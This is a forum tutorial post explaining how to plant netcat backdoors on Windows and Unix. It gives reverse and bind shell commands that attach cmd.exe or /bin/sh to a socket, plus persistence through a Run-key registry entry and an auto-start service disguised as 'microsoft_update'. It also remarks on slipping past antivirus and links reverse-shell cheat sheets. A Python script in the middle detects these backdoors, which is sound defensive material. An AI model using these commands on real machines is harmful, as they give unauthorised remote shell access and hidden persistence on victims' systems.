My apologies for not being active for so long, but I should be here for at least a little bit now...
So to get started, backdoors with netcat.
If you do not already know what netcat is, I am referring to Hobbit's netcat (the nc111nt Windows port), which you can find here:
http://joncraton.org/media/files/nc111nt.zip
Firefox told me it was possibly malicious, which it is. I'm telling you how to create a backdoor; your system will go crazy. If you believe it's a virus then so be it, you can stop reading now.
Netcat is referred to as the Swiss Army knife of networking. It's a fairly simple application that opens a TCP (or UDP) connection to another computer, or listens for one, and shovels data between that connection and its own standard input and output.
You can view the entire help text with nc.exe -h, but for now the two important invocations are:
nc.exe -l -p port
creates a listener on that port (with plain -l it exits once the first client disconnects).
nc.exe ipoflistener portoflistener
connects to that listener.
That's great and all, but what really makes netcat useful as a backdoor is the -e option, which runs a program once the connection is up, with that program's stdin, stdout and stderr attached to the socket. So for example:
nc.exe ipoflistener portoflistener -e cmd.exe
gives whoever is sitting on the listener a Windows shell as soon as the connection comes up. That is the basic principle of the netcat backdoor: get the target to run netcat so that a port leads to a shell, connect, and you have a shell. In the form above the connecting side carries -e, so the target connects out to your listener and hands you its shell (a reverse shell, which is what you want when inbound connections to the target are filtered). The other version is to put -e on the listener instead, so all you have to do is connect to the target's port and you are automatically dropped into a shell (a bind shell). Not too much of a difference, but it can help in certain situations. The only problem with a single -l listener is that as soon as you connect and then disconnect, there is no listener waiting any more, so let's fix that.
nc.exe -d -L -p 12345 -e cmd.exe
spawns the listener on port 12345; -L ("listen harder", Windows port only) goes back to listening after each client disconnects instead of exiting like -l, and -d detaches from the console so no window is left open.
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v microsoft_service /t REG_SZ /d "c:\nc.exe -d -L -p 12345 -e cmd.exe"
adds it to the machine-wide Run key, so it starts (in that user's context) whenever anyone logs on.
sc create microsoft_update binpath= "cmd /K start c:\nc.exe -d -L -p 12345 -e cmd.exe" start= auto error= ignore
registers it as an auto-start Windows service. Two things to know: sc only accepts its options with a space after the "=" (binpath= "...", start= auto), and since cmd.exe is not a real service executable the Service Control Manager will report error 1053 (the service did not respond in time) when it starts it; the nc.exe launched through "start" is a separate process that survives that, which is the whole point of the cmd /K start wrapper.
The above two commands I borrowed from this site:
http://blog.pusheax.com/2012/04/power-of-netcat.html
so I cannot guarantee that they work; I have yet to test them.
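As an added example (not from the post or the site it borrows from), here is how to read back what the two persistence commands above leave behind. On the target, reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run and sc qc microsoft_update print the entries; this Python script parses the text those two commands print and flags any command line that looks like a netcat listener executing a shell. The sample output embedded in it is constructed for the example, not captured from a real host, and includes benign entries to show they are not flagged. The regexes and function names are mine, and it is a heuristic: a renamed binary is only caught by the -L/-e flag pattern, and a listener that does not use netcat is not caught at all.

```python
"""Audit the Run key and service config for a netcat-style backdoor.

Parses the output of `reg query HKLM\...\Run` and `sc qc <service>` (sample
text below is constructed, not captured) and flags command lines that look
like a netcat listener that executes a program on connect.
"""
import re

SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    microsoft_service    REG_SZ    c:\nc.exe -d -L -p 12345 -e cmd.exe
"""

SAMPLE_SC_QC_BACKDOOR = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: microsoft_update
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : cmd /K start c:\nc.exe -d -L -p 12345 -e cmd.exe
        DISPLAY_NAME       : microsoft_update
        SERVICE_START_NAME : LocalSystem
"""

SAMPLE_SC_QC_BENIGN = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Spooler
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\spoolsv.exe
        SERVICE_START_NAME : LocalSystem
"""

# Heuristic patterns (my own, not a vendor signature).
NETCAT_BIN = re.compile(r'(?:^|[\\/\s"])(?:nc|ncat|netcat)(?:\.exe)?\b', re.IGNORECASE)
LISTEN_FLAG = re.compile(r"(?<!\S)-[lL](?!\S)")            # -l or the Windows-only -L
EXEC_FLAG = re.compile(r"(?<!\S)-[ec](?!\S)\s+(\S+)")       # -e prog (or ncat's -c)
SHELL_WRAPPER = re.compile(r"(?:^|\s)cmd(?:\.exe)?\s+/[kKcC]\s+start\s", re.IGNORECASE)

# One Run-key value per line: <indent><name><4 spaces><REG_type><4 spaces><data>
REG_LINE = re.compile(r"^\s+(.+?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*)$", re.MULTILINE)


def parse_reg_query(text):
    """Return [(value_name, value_data)] from `reg query <key>` output."""
    return [(name, data.strip()) for name, _type, data in REG_LINE.findall(text)]


def parse_sc_qc(text):
    """Return (service_name, binary_path) from `sc qc <service>` output, or None."""
    name = re.search(r"SERVICE_NAME:\s*(\S+)", text)
    path = re.search(r"BINARY_PATH_NAME\s*:\s*(.*)", text)
    if not (name and path):
        return None
    return name.group(1), path.group(1).strip()


def reasons_for(cmdline):
    """Why a command line looks like a netcat backdoor; empty list if it does not."""
    reasons = []
    if NETCAT_BIN.search(cmdline):
        reasons.append("launches a netcat binary")
    if LISTEN_FLAG.search(cmdline):
        reasons.append("listens for inbound connections (-l/-L)")
    m = EXEC_FLAG.search(cmdline)
    if m:
        reasons.append("executes %s on connect (-e/-c)" % m.group(1))
    if SHELL_WRAPPER.search(cmdline):
        reasons.append("service binary is a cmd /K start wrapper, not a service executable")
    return reasons


def audit(reg_query_text, sc_qc_texts):
    """Flag Run-key values and services whose command line matches the heuristic."""
    findings = []
    for name, data in parse_reg_query(reg_query_text):
        r = reasons_for(data)
        if r:
            findings.append({"where": "HKLM Run key", "name": name, "cmdline": data, "reasons": r})
    for text in sc_qc_texts:
        parsed = parse_sc_qc(text)
        if parsed is None:
            continue
        name, path = parsed
        r = reasons_for(path)
        if r:
            findings.append({"where": "service", "name": name, "cmdline": path, "reasons": r})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_REG_QUERY, [SAMPLE_SC_QC_BACKDOOR, SAMPLE_SC_QC_BENIGN]):
        print("%s %r: %s\n    %s" % (f["where"], f["name"], "; ".join(f["reasons"]), f["cmdline"]))
```

On a live host you would feed the script the real output of the two commands (plus netstat -ano to confirm port 12345 is actually listening); the service entry is the easier of the two to spot because a legitimate service almost never has a cmd /K start wrapper as its binary path.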
Now everything above was for a Windows machine, using cmd.exe. It's essentially the same on a Unix system: use /bin/sh instead of cmd.exe. Two caveats, though: -L and -d exist only in the Windows port, so on Unix a plain -l listener is gone after the first client disconnects unless you wrap it in a loop, and many Linux distributions ship a netcat built without -e at all (OpenBSD's nc, or the traditional one compiled without GAPING_SECURITY_HOLE), in which case you need the named-pipe (mkfifo) version from the reverse shell cheat sheet linked in EDIT2 below. More on that here:
http://shebangme.blogspot.com/2011/07/netcat-cheat-sheet.html
Netcat is my favorite tool, makes everything much easier, very simple, and really isn't that hard to mask behind AV at all. A scan of the plain, non-encrypted nc.exe on VirusTotal showed that only 24/47 engines flagged it. This means that some AVs don't consider it a virus, so yay for us.
Another useful link is the SANS netcat cheat sheet, which shows some more uses and how to do them:
http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
That's that. I know netcat is older and there are better tools out there, but it's still a fundamental tool and can be used in a lot of different scenarios. Thanks for reading, and I hope you learned something or at least enjoyed the info.
-Fear
EDIT: Random size tags appeared, fixed now
EDIT2: I forgot to mention, reverse shells are a wonderful thing. For more, in several different languages:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet